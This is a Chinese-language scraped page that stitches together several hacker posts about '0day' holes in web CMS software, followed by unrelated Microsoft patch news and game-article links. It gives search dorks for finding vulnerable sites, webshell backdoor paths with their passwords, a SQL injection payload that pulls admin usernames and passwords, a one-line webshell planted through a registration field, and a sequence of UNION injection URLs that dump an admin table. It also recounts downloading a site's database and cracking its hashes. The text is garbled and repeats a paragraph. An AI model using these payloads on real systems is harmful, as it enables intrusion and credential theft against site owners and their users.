游戏网站程序0DAY漏洞预警(推荐7篇)
挖掘:百事可乐
准确点应该算是backdoor
inurl:Find.asp 您的位置 >>客服中心 >>找回密码
直接传马:
www.XXX.com/user/situjiaduotu2.asp
一句话backdoor ,密码 : value
www.XXX.com/htmledit/Include/upfile_class.asp
www.XXX.com/htmleditIncludeDeCode.asp
读库提权:
中国旅游服务网站管理系统CTSCMS,这个网站系统是我在近期发现的,使用dedecms二次开发的,织梦内核。由于忽视了官方的系统升级导致程序有很多的漏洞。近期爆出的注入漏洞都存在,历史的漏洞不知道是否存在。
Google:2002-2011 CTSCMS.COM ,inurl:users/reg.php旅行社
POC:/plus/search.php?keyword=as&typeArr[111%3D@`'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`'`+]=a
后来我又发现,这套程序都是一个人在做 国内很多旅行社网站在用
很多大型旅行社网站都在用,请在法律允许的范围内测试,
保重....
★ 智有道专业旅游系统 v1.0 漏洞漏洞预警
★ JEECMS漏洞(文件上传)漏洞预警
★ 米号吧文章管理系统跨站0day漏洞漏洞预警
★ 天空课堂文件上传漏洞漏洞预警
★ 智有道专业旅游系统 v1.6.5 漏洞漏洞预警
★ 腾讯多个unfixed bugs漏洞预警
★ mPDF = 5.3文件泄露及修复漏洞预警
★ WespaJuris = 3.0多个缺陷及修复漏洞预警
★ Joomla! JomSocial组件任意文件上传漏洞及修复漏洞预警
关键字:inurl:/soft/show.asp?id=*
看别人丢出来了,我也不藏了,丢出来大家耍一下了,
漏洞很简单,就是插一句话到ASK的数据库,register.asp
直接访问ask,然后注册用户,密码问题这插入一句话:┼�}�诞�整����超�∨≡┩��
注册成功后一句话连接:ask/data/ask_newasp.asa 密码:a
关键字大家自己找了,很简单的,
?id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20concat(0x7e,0x27,count(table_name),0x27,0x7e)%20FROM%20information_schema.tables%20WHERE%20table_schema=0x3274616F6B655F64656D6F),2,3--
?id=-999.9%20UNION%20ALL%20SELECT%20(select%20concat(0x7e,0x27,Hex(cast(group_concat(table_name)%20as%20char)),0x27,0x7e)%20FROM%20information_schema.tables%20Where%20table_schema=0x3274616F6B655F64656D6F),2,3--
?id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20concat(0x7e,0x27,count(column_name),0x27,0x7e)%20FROM%20information_schema.columns%20WHERE%20table_schema=0x3274616F6B655F64656D6F%20AND%20table_name=0x3274616F6B655F61646D696E),2,3--
?id=-999.9%20UNION%20ALL%20SELECT%20(select%20concat(0x7e,0x27,Hex(cast(group_concat(column_name)%20as%20char)),0x27,0x7e)%20FROM%20information_schema.columns%20Where%20table_schema=0x3274616F6B655F64656D6F%20AND%20table_name=0x3274616F6B655F61646D696E),2,3--
?id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20concat(0x7e,0x27,count(*),0x27,0x7e)%20FROM%202taoke_demo.2taoke_admin),2,3--
?id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20concat(0x7e,0x27,Hex(cast(2taoke_admin.adminname%20as%20char)),0x27,0x7e)%20FROM%202taoke_demo.2taoke_admin%20LIMIT%200,1)%20,2,3--
?id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20concat(0x7e,0x27,Hex(cast(2taoke_admin.adminpass%20as%20char)),0x27,0x7e)%20FROM%202taoke_demo.2taoke_admin%20LIMIT%200,1)%20,2,3--
技术人坚信技术会说话的,只要用户体验好,真正的能给用户带来用户所想得到的资源这就是最好的优化,
闲话不多说,遇到一个站啊啊啊,排名不错一个二级热门关键词第一。
网站程序是国外的asp(傻眼了吧,叫你鸟语不好)
有无效注入点
没有旁站
也木什么插件(有个FL整了半天还没用)
好吧,扫目录吧,金库的嗅探狗的生活开始了。(最讨厌翻目录,眼睛不好啊啊啊啊)
咦 ?这个是什么?
话说在站点根目录下有一个似曾相识的东西,
robots是一个TXT文档必须在站点的根目录下,告诉搜索引擎那些蜘蛛可以索引那些不可以索引,一般例如附件,模板文件,CSS文件,数据库(该项的值用于描述不希望被访问的一组URL,这个值可以是一条完整的路径,也可以是路径的非空前缀,以Disallow项的值开头的URL不会被robot访问)
不但不会增加网站的收录,还会浪费服务器资源,
看样子站长对SEO有研究啊~robots表明了一切。
Disallow:/data/数据库文件 蜘蛛不可以索引数据库相关文件,在数据库下面还有几个小的分组。
哇咔咔~直接可以下载数据库啊! 我的人品爆发?
收费的的MD5啊啊啊,和谐群里大大帮助啊!感谢。
换了字典啊啊啊啊美国佬的?后台扫出,以管理员身份登录之。
后台和某新闻管理系统差不多,谷歌翻译开着~一个个翻译。竟然有数据库备份。
剩下的不解释。
金山清理专家已经在第一时间更新出此官方补丁,广大用户可免费下载使用金山清理专家(www.duba.net)进行修复。
据金山毒霸反病毒专家李铁军介绍,微软视频0day漏洞利用起来较为简单,只要用户访问包含基于该漏洞所制造的脚本木马的网站,即便没有播放视频,脚本木马也能对用户电脑进行攻击,触发率较高。
微软在一份声明中称,这些补丁软件将解决同一个问题。但分开发布有助于向客户提供尽可能广泛的保护,
微软称,这些缺陷影响Windows 2000、Windows XP、Vista、Windows Server 2003和2008,以及IE 6、7和8,Visual Studio .NET 2003、Visual Studio 2005和2008,Visual C++ 2005和2008。将通过Microsoft Update、Windows Update和Windows Server Update服务发布这些补丁软件。
据了解,一般微软要在月度安全更新中发布比较重要的补丁,本次为了及时解决问题,破例在补丁星期二就放出。但这距离视频0day漏洞被发现已经过去了20多天。微软截至目前还不能提供有关此补丁的详细说明。
在该漏洞被发现伊始,金山毒霸曾建议广大用户下载金山网盾进行防御。而今
近几天网络上流传着一个传说为IE0DAY的POC代码,在XP系统环境下通杀了IE6和IE7,其它系统并未经过测试,其实这个漏洞并不是存在于IE,而是Microsoft Works的组件被挖掘出漏洞,部分的XP预装了Microsoft Works,所以就出现了过全补丁系统的漏洞(如华硕易PC 就预装了Micros
近几天网络上流传着一个传说为IE0DAY的POC代码,在XP系统环境下通杀了IE6和IE7,其它系统并未经过测试。其实这个漏洞并不是存在于IE,而是Microsoft Works的组件被挖掘出漏洞,部分的XP预装了Microsoft Works,所以就出现了过全补丁系统的漏洞(如华硕易PC 就预装了Microsoft Works),影响的DLL版本:Microsoft Works 7 WkImgSrv.dll (7.03.0616.0) 以下为crash POC
Microsoft Works 7 WkImgSrv.dll crash POC
【游戏网站程序0DAY漏洞预警】推荐阅读:
游戏开发程序06-17
游戏游戏角色05-28
民间游戏手指游戏09-24
游戏大全晨会游戏11-22
游戏集锦破冰游戏01-04
游戏名称游戏操作09-11
表演游戏与角色游戏10-14
拼图游戏大全闯关游戏10-20
玩游戏女生游戏11-20
游戏策划方案-----“瞎子” 游戏11-24
